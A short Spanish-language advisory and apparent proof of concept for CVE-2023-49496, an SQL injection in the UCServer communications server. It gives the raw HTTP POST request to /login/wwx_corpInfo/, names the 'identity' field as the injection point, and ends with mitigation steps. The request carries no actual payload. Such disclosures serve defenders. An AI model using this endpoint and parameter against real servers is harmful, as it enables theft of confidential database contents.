
Exploit de prueba de concepto para CVE-2023-49496, que demuestra inyección SQL en UCServer a través del endpoint /login/wwx_corpInfo/ para extraer información sensible de la base de datos.
UCServer es un avanzado servidor de comunicaciones unificadas. El UCServer de Shanghai Shupin Information Technology Co., Ltd. presenta una vulnerabilidad de inyección SQL; los atacantes pueden aprovechar esta vulnerabilidad para obtener información confidencial de la base de datos.
POST /login/wwx_corpInfo/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://example.com/
Content-Length: 132
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: example.com
Proxy-Connection: Keep-alive
&identity=
El parámetro "identity" en el cuerpo de la solicitud POST es el punto de inyección.

Activar el firewall del sitio web; prohibir que cualquier IP acceda a la ruta "/login/wwx_corpInfo/"; prohibir que la base de datos acepte conexiones remotas externas; actualizar la versión de la base de datos.